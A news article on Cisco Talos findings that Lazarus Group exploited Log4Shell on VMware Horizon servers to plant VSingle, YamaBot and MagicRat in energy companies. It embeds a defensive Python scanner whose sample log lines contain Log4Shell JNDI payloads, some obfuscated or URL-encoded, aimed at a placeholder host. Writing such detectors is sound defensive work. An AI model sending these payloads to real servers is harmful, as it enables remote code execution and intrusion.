The North Korean state-sponsored actor Lazarus Group has been compromising VMware Horizon servers by exploiting the Log4j flaw, in order to target energy companies in the U.S., Canada and Japan.
The attacks, observed between February and July, leveraged Log4Shell in order to gain an initial foothold in the victims’ networks before deploying several custom malware implants, including VSingle and YamaBot, both of which are exclusively developed and distributed by Lazarus, as well as a previously unknown malware called MagicRat.
“The main goal of these attacks was likely to establish long-term access into victim networks to conduct espionage operations in support of North Korean government objectives,” said Jung soo An, Asheer Malhotra and Vitor Ventura, researchers with Cisco Talos, in a Thursday analysis. “This activity aligns with historical Lazarus intrusions targeting critical infrastructure and energy companies to establish long-term access to siphon off proprietary intellectual property.”
Lazarus, which has been attributed to the North Korean government by the U.S. government, has been active since 2010. Its campaign motives have included espionage, data theft, financial gain and disruptive attacks. Outside of government, defense and critical infrastructure organizations, the threat actor has also been targeting cryptocurrency investors, exchanges and blockchain organizations over the past year in order to install malware and steal funds and other data.
After gaining initial access via the Log4j flaw, the threat actor established a reverse shell to issue arbitrary commands, performed preliminary reconnaissance to obtain more network information and directory listings, and disabled protections such as Windows Defender components before installing malware (notably, VMware Horizon runs with administrator privileges, so the attacker did not need to escalate privileges).
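The initial-access step above is the one a defender can hunt for directly: Log4Shell requests against an internet-facing Horizon server land in the web-server access log. The following is an added example, not code from Cisco Talos or the article, and it generalizes past the plain `${jndi:...}` form to the lookup-based obfuscations (`${lower:...}`, `${upper:...}`, `${...:-...}`) and URL encoding commonly used to hide the `jndi` keyword. The log lines, request paths and 203.0.113.x addresses are constructed for the demonstration.

```python
import re
import urllib.parse
from typing import List, Optional, Tuple

# Lookups used to hide the literal "jndi": ${lower:J}->j  ${upper:j}->J  ${::-j}->j  ${env:X:-j}->j
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{([^${}]*?):-([^${}]*)\}")
# Log4j resolves lookup names case-insensitively, so match "jndi" in any case.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^}\s]*)", re.IGNORECASE)
_MAX_ROUNDS = 20  # nested lookups are unwound innermost-first; cap the loop

def _case(m) -> str:
    return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()

def normalize(text: str) -> str:
    """URL-decode, then repeatedly resolve obfuscating lookups until the string is stable."""
    text = urllib.parse.unquote(text)
    for _ in range(_MAX_ROUNDS):
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(2), _CASE_LOOKUP.sub(_case, text))
        if new == text:
            break
        text = new
    return text

def find_jndi(text: str) -> Optional[str]:
    """Return 'scheme://target' of the first JNDI lookup in text, or None if there is none."""
    m = _JNDI.search(normalize(text))
    return f"{m.group(1).lower()}://{m.group(2)}" if m else None

def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, jndi_target) for every access-log line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        target = find_jndi(line)
        if target:
            hits.append((n, target))
    return hits

# Constructed access-log lines (not real traffic); 203.0.113.0/24 is documentation address space.
SAMPLE_LOG = [
    '203.0.113.10 - - [15/Mar/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [15/Mar/2022:10:01:05 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.12 - - [15/Mar/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/b}"',
    '203.0.113.13 - - [15/Mar/2022:10:01:12 +0000] "GET /portal/?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Armi%3A%2F%2F203.0.113.5%3A1099%2Fc%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for n, target in scan_log(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup to {target}")
```

Every hit names the callback host the lookup would contact, which is the value to pivot on in outbound DNS and firewall logs when deciding whether the attempt succeeded.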
The malware used in these campaigns included a known malware family developed by Lazarus called VSingle, which has reconnaissance, exfiltration, lateral movement and credential harvesting capabilities. Another incident used a different implant called YamaBot, a custom Golang-based malware family that was recently attributed to Lazarus by the Japanese CERT (JPCERT/CC). YamaBot has several standard RAT capabilities, including listing files and directories, sending process information to the command-and-control (C2) server, downloading files from remote locations and executing arbitrary commands on the endpoints.